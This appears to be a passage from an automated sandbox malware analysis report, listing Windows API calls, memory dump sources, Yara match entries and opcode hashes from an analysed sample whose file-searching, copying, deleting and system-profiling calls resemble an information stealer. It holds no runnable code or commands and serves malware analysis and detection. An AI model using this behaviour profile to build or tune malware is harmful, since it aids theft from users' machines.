                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                        • wsprintfA.USER32 ref: 00418850
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 2716131235-2206825331
                        • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                        • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                        • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                        • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcessstrtok_s
                        • String ID:
                        • API String ID: 3407564107-0
                        • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                        • Instruction ID: cae6dfbb8b0a00095e2cb9d19b485fa3c323730ae417f077d85d91caaf9260b4
                        • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                        • Instruction Fuzzy Hash: EB111974910209EFCB04DFE4D958AEDBBB5FF04345F108469E90666250E7746B44CF99
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                        • wsprintfA.USER32 ref: 004179F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 1243822799-0
                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                        • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                        • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 040B7C17
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B7C1E
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 040B7C2B
                        • wsprintfA.USER32 ref: 040B7C5A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                        • Instruction ID: efd6fa82a41644d0d8a12d399307d1e0f203a3e4359654b2944dbc3b1f35d64b
                        • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                        • Instruction Fuzzy Hash: B51139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 040B7CCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B7CD1
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 040B7CE4
                        • wsprintfA.USER32 ref: 040B7D1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                        • Instruction ID: d725e83bd7477e29e6fe4cf39c3d2d3301730e7238b95cd51f017cb8132a7aa5
                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                        • Instruction Fuzzy Hash: B411A1B1A45218EFEB20CF54DC49FA9B7B8FB45761F10039AF50AA32C0D77429408F95
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strtok_s
                        • String ID:
                        • API String ID: 3330995566-0
                        • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                        • Instruction ID: b13d6505b9113501f18a68a0468945dc4cfd4a70f73e25e7f5570e5a14d59f63
                        • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                        • Instruction Fuzzy Hash: 1D11E3B4E40209AFDB14CFA6D948AEEB7B5AB04705F20C029E865B6250D774A501CF99
                        APIs
                        • CreateFileA.KERNEL32(040B3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,040B3D55,?), ref: 040B9563
                        • GetFileSizeEx.KERNEL32(000000FF,040B3D55), ref: 040B9580
                        • CloseHandle.KERNEL32(000000FF), ref: 040B958E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID:
                        • API String ID: 1378416451-0
                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                        • Instruction ID: c35739d4fd9a1a220ea190c405fa1c0b575aa3c7284c4ff1d845dd26a8a8b32f
                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                        • Instruction Fuzzy Hash: 4DF04479F80204BBDB10DFF0DC49BDE7BBAEB49710F11C654FA51A7180D635A6018B45
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D31
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 040B6D4F
                        • CloseHandle.KERNEL32(00000000), ref: 040B6D60
                        • Sleep.KERNEL32(00001770), ref: 040B6D6B
                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D81
                        • ExitProcess.KERNEL32 ref: 040B6D89
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                        • Instruction ID: 7c74dc0bdb11df7926eec5be570de047b56d63da5538329065b78eb9a9c11912
                        • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                        • Instruction Fuzzy Hash: C3F05E78B40205BEFB10ABE0DC08BFD76B5EB05749F101A18F582B5190DBB16540CADF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: `o@
                        • API String ID: 0-590292170
                        • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                        • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                        • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                        • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                        APIs
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                        • lstrcatA.KERNEL32(?,024DD580), ref: 00414C08
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,024D99F0,?,000003E8), ref: 00414A4A
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: UaA
                        • API String ID: 2104210347-3893042857
                        • Opcode ID: 7aa901901dc909a98e828e7de91596a84bf0f77b9a11efe6e26eea0aae08d754
                        • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                        • Opcode Fuzzy Hash: 7aa901901dc909a98e828e7de91596a84bf0f77b9a11efe6e26eea0aae08d754
                        • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: SystemTimelstrcpy
                        • String ID: cI@$cI@
                        • API String ID: 62757014-1697673767
                        • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                        • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                        • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                        • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                        APIs
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                        • lstrcatA.KERNEL32(?,024DCC10), ref: 004150A8
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                        • String ID: aA
                        • API String ID: 2699682494-2567749500
                        • Opcode ID: 51266d4d9ddb75a6f059c37d3d6b80fd1acaef9bed24dae35b8ecbb315133994
                        • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                        • Opcode Fuzzy Hash: 51266d4d9ddb75a6f059c37d3d6b80fd1acaef9bed24dae35b8ecbb315133994
                        • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                        • lstrlen.KERNEL32(00000000), ref: 040ABF06
                          • Part of subcall function 040B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 040B90B9
                        • StrStrA.SHLWAPI(00000000,004213E0), ref: 040ABF34
                        • lstrlen.KERNEL32(00000000), ref: 040AC00C
                        • lstrlen.KERNEL32(00000000), ref: 040AC020
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                        • String ID:
                        • API String ID: 1440504306-0
                        • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                        • Instruction ID: 357f8c8d2a0022ce8b450c7d378dfd989f2e43a6b79c4b6c83a45e9786b42d48
                        • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                        • Instruction Fuzzy Hash: 9AB17F71A10208ABEF18FBA4DD91EEE7379AF5420CF544159E546B2090EF387B48CFA5
                        APIs
                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$CloseFileNextlstrcat
                        • String ID: !=A
                        • API String ID: 3840410801-2919091325
                        • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                        • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                        • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                        • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                        APIs
                          • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                        • lstrcat.KERNEL32(?,00000000), ref: 040B51E1
                        • lstrcat.KERNEL32(?,00421070), ref: 040B51FE
                        • lstrcat.KERNEL32(?,0064A5F8), ref: 040B5212
                        • lstrcat.KERNEL32(?,00421074), ref: 040B5224
                          • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4B93
                          • Part of subcall function 040B4B77: FindFirstFileA.KERNEL32(?,?), ref: 040B4BAA
                          • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 040B4BD8
                          • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 040B4BEE
                          • Part of subcall function 040B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 040B4DE4
                          • Part of subcall function 040B4B77: FindClose.KERNEL32(000000FF), ref: 040B4DF9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                        • Instruction ID: 8cb6cc071227cc375e800201d24145c681b98eb5fb9208af7a72624dbf430283
                        • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                        • Instruction Fuzzy Hash: 7521C87AA40208BBD714FBF0DC45EED337DAB55304F404188B6C5A6190DE74AAC9CBE6
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID:
                        • API String ID: 1206339513-0
                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                        • Instruction ID: 06066706b2fcea93d4fc10a591e51c4c6a031ca4d0c5ee7aac7cc6ab23db3f53
                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                        • Instruction Fuzzy Hash: 8901DE79540108FFCB04DFECD994EAE7BBAEF45394F108148F9499B301C635AA40DB95